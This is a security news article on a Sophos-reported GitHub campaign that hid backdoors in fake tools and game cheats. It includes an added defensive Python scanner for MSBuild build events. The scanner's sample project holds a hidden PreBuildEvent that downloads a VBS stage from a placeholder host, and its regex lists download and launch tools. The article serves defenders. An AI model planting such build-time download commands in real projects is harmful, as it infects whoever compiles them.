Sophisticated GitHub Malware Campaign Exploits Trust in Open Source Repositories

CyberSecureFox 🦊

Cybersecurity researchers at Sophos have uncovered a sophisticated malware distribution campaign that weaponizes GitHub’s trusted platform to target security professionals, gamers, and researchers. The operation involves 141 malicious repositories, with 133 containing hidden backdoors disguised as legitimate security tools, game cheats, and exploits.

Discovery Through Sakura RAT Analysis

The investigation began when a Sophos client requested an assessment of the Sakura RAT trojan discovered in a public GitHub repository. While the trojan itself appeared non-functional, researchers identified a hidden PreBuildEvent mechanism within the Visual Studio project that automatically downloads and installs malware when users attempt to compile the code.

Further investigation revealed that the publisher, operating under the pseudonym “ischhfd83,” maintained connections to 141 GitHub repositories. This discovery exposed the true scope of the operation, demonstrating how threat actors exploit the open-source community’s trust in collaborative development platforms.

Advanced Deception Techniques

The attackers employed sophisticated methods to create an illusion of legitimate development activity. Automated commit systems generated fake development histories, with some projects displaying nearly 60,000 commits despite being created only months earlier. The average commit count across malicious repositories reached 4,446 at the time of analysis.

To avoid detection, threat actors limited each account to a maximum of nine repositories and used no more than three contributors per project. This strategy helped maintain a lower profile while maximizing the campaign’s reach across the platform.

Multi-Vector Distribution Strategy

Traffic to malicious repositories originated from diverse sources, including YouTube tutorials, Discord communities, and specialized hacking forums. Media coverage of Sakura RAT inadvertently amplified the campaign’s effectiveness, attracting attention from novice hackers and script kiddies seeking ready-made tools.

The campaign specifically targeted three primary audiences: cybersecurity professionals researching new tools, gamers seeking cheats and modifications, and IT specialists studying malware samples for educational purposes.

Complex Infection Chain

The malware deployment process involves a multi-stage attack chain that begins when users download and execute trojanized files. The infection sequence includes VBS script execution, encrypted payload retrieval through PowerShell from hardcoded URLs, 7zip archive downloads from GitHub, and deployment of a specialized Electron application called SearchFilter.exe.

The final payload contains obfuscated code designed for system profiling, command execution, Windows Defender deactivation, and additional component extraction. Researchers identified various malicious programs within the campaign, including Lumma infostealers, AsyncRAT, and Remcos trojans.

Diverse Backdoor Implementation Methods

Analysis revealed multiple backdoor deployment techniques across the malicious repositories. Python scripts contained obfuscated payloads, while malicious screensaver files leveraged Unicode encoding for evasion. JavaScript files employed encoded payloads, and Visual Studio PreBuild events enabled automatic execution without user awareness.
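One defender-side check for the Visual Studio PreBuildEvent trick described here and in the Sakura RAT section: an added Python example, not code from Sophos or from this article, that walks an MSBuild project file (.csproj/.vcxproj) and flags build-time commands that look like they fetch or launch something. The sample project, indicator list and function names are constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET

# MSBuild elements whose contents run a shell command during a build.
BUILD_EVENT_TAGS = {"PreBuildEvent", "PostBuildEvent", "PreLinkEvent", "Exec"}

# Indicators of a build step that downloads or launches code (constructed list, not exhaustive).
SUSPICIOUS = re.compile(
    r"powershell|pwsh|invoke-webrequest|iwr\b|downloadstring|downloadfile|"
    r"curl\b|wget\b|bitsadmin|certutil|mshta|wscript|cscript|https?://|"
    r"-enc\b|-encodedcommand|frombase64string",
    re.IGNORECASE,
)

def _local(tag: str) -> str:
    """Strip the MSBuild XML namespace so old-style and SDK-style projects look alike."""
    return tag.rsplit("}", 1)[-1]

def find_build_events(project_xml: str):
    """Return (element name, command, suspicious?) for every build-time command in a project."""
    root = ET.fromstring(project_xml)
    findings = []
    for elem in root.iter():
        name = _local(elem.tag)
        if name not in BUILD_EVENT_TAGS:
            continue
        # <Exec Command="..."/> keeps its command in an attribute; build events keep it as text.
        command = elem.get("Command") if name == "Exec" else (elem.text or "")
        command = command.strip()
        if command:
            findings.append((name, command, bool(SUSPICIOUS.search(command))))
    return findings

# Constructed sample project: one benign post-build echo plus a hidden Release-only pre-build download.
SAMPLE_CSPROJ = """<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <PropertyGroup>
    <PostBuildEvent>echo build finished</PostBuildEvent>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)'=='Release'">
    <PreBuildEvent>powershell -w hidden -c "iwr http://example.invalid/stage.vbs -OutFile $(TEMP)\\s.vbs"</PreBuildEvent>
  </PropertyGroup>
</Project>
"""

if __name__ == "__main__":
    for tag, cmd, bad in find_build_events(SAMPLE_CSPROJ):
        print(("SUSPICIOUS " if bad else "ok         ") + f"<{tag}> {cmd}")
```

Because the malicious event sits in a conditioned PropertyGroup, it never shows in the IDE's default Debug view; scanning the raw XML before opening or building a cloned project catches it regardless of configuration.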

This variety in attack vectors demonstrates the threat actors’ technical sophistication and understanding of different development environments commonly used by their target audiences.

Critical Security Implications

This campaign highlights significant risks associated with unverified code from open repositories, particularly for cybersecurity professionals who regularly analyze suspicious software. The attackers successfully exploited the community’s trust in GitHub’s platform and the open-source development model.

Organizations must implement comprehensive security measures including thorough source code review before compilation, isolated testing environments for suspicious software, and continuous network activity monitoring. This incident underscores the importance of maintaining critical thinking even within the cybersecurity community, where threat actors successfully exploit professional curiosity and trust. Security teams should establish clear protocols for evaluating third-party code and maintain updated threat intelligence to recognize similar campaigns targeting their industry.
